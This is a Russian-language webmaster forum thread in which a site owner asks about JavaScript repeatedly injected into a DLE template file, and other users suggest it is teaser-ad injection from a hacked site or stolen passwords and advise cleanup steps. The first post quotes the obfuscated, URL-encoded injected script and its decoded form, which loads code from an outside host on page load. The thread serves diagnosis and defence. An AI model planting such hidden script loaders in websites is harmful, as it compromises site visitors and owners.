X   Сообщение сайта
(Сообщение закроется через 3 секунды)


 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вирус перед счетчиков Li на DLE
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 16:22; Ответить: CaHbka
Сообщение #1


Уже несколько раз удаляют такой код с сайта:

<script language="JavaScript">document.write(unescape("%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%27%4a%61%76%61%53%63%72%69%70%74%27%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%75%6e%69%31%34%2e%72%75%2f%77%70%68%65%61%64%65%72%2e%70%68%70%3f%69%3d%31%35%39%36%33%27%3e%3c%2f%73%63%72%69%70%74%3e"))</script>


После расшифровки:

<script language="JavaScript">document.write(unescape("<script language='JavaScript' src='http://uni14.ru/wpheader.php?i=15963'></script>"))</script>


Код всегда находиться выше счетчика от Liveinternet. Код на сайте появляеться примерно раз через 10 дней. Ставят код только в одном файле main.tpl основного шаблона, другие шабы не трогают.

Версия DLE 9.2.

Подскажите что это за хрень и как лечить?

P.S. Обновлять CMS не предлагайте.

Спасибо.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BelCoder
BelCoder
сообщение 1.2.2012, 16:35; Ответить: BelCoder
Сообщение #2


Похоже на накрутку показа тизерных блоков, скорее всего была установлена не очень чистая версия движка, или же просто взлом

Если код ставится сразу перед счетчиком LI, то попробуйте удалить "<!--LiveInternet counter-->", возможно он на эту часть кода ориентируется.
Хотя если взлом и ручная простановка кода, тогда поработайте над безопасностью

Сообщение отредактировал BelCoder - 1.2.2012, 16:36


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 16:38; Ответить: CaHbka
Сообщение #3


Такая же версия висит ещё на 4 сайтах на этом хостинге, но ломают только этот.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fobos
fobos
сообщение 1.2.2012, 16:49; Ответить: fobos
Сообщение #4


Типичный вредоносный код, внедряется в основной файл шаблона или помещается файл с кодом в папку (обычно images) и начинает заражать все файла.
Сайт был взломан или украдены пароли к сайту/ftp.

Сообщение отредактировал fobos - 1.2.2012, 16:51


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 1.2.2012, 17:26; Ответить: House
Сообщение #5


Обычный код тизерки smile.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 17:30; Ответить: CaHbka
Сообщение #6


Обычный код тизерки smile.gif


Только яндекс теперь ругаеться на сайт =(


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bobur
bobur
сообщение 1.2.2012, 18:53; Ответить: bobur
Сообщение #7


Могу за оплату найти и обезвредить...


--------------------
Мастер по Datalife Engine на ТУТ. ICQ:359803651.

CверхБыстрые VPS/VDS по системе Все включено! 60% скидка. Купон:60OFFAVPS
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nick777
nick777
сообщение 1.2.2012, 20:28; Ответить: nick777
Сообщение #8


* Качаете отсюда утилиты по поиску вирусов: comss.ru.
* Проверяете компьютер с помощью утилит и своего антивируса
* Настраиваете антивирус на режим повышенной безопасности
* Меняете все пароли на всех аккаунтах, ftp и т.д.
* PROFIT!

P.S. Ну и, естественно, проверяете все сайты на вирусы и удаляете код вируса.

Сообщение отредактировал nick777 - 1.2.2012, 20:30


--------------------
На мобильной рекламе можно зарабатывать по-белому здесь!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
asAlbert
asAlbert
сообщение 1.2.2012, 21:05; Ответить: asAlbert
Сообщение #9


(nick777 @ 1.2.2012, 20:28) *
* Качаете отсюда утилиты по поиску вирусов: comss.ru.
* Проверяете компьютер с помощью утилит и своего антивируса
* Настраиваете антивирус на режим повышенной безопасности
* Меняете все пароли на всех аккаунтах, ftp и т.д.
* PROFIT!

P.S. Ну и, естественно, проверяете все сайты на вирусы и удаляете код вируса.


Выше было сказано, что похекали только один сайт из нескольких. Если версия CMS везде одинаково, то скорее всего уязвимость в плагине, либо пробрутили пароль в админку.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 21:20; Ответить: CaHbka
Сообщение #10


Пароли поменял, на файлы шаблоны установил CHMOD заприщающий редактировать файлы через Админку.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыГорячий оффер перед праздниками - Флористические шедефры. Высокие отчисления.
10 cvetaletastudio 364 12.2.2021, 21:12
автор: EvilGomel
Горячая тема (нет новых ответов) Качественная накрутка счетчиков/трафик
Накрутка статистики,посещений
40 seostock 20011 6.2.2021, 23:54
автор: seostock
Горячая тема (нет новых ответов) Изготовление красивых сайтов на DLE под ключ | Доступные цены
45 Admiral_ukr 20020 9.1.2021, 18:55
автор: Admiral_ukr
Открытая тема (нет новых ответов) Перенос сайта с DLE на Wp
2 IxMaster 569 7.1.2021, 23:36
автор: IxMaster
Открытая тема (нет новых ответов) После переноса сайт на DLE перестал корректно работать
Ищу того, кто может помочь заново все верно настроить
6 mr_LasVegas 767 20.7.2020, 20:52
автор: asd4


 



RSS Текстовая версия Сейчас: 26.2.2021, 14:00
Дизайн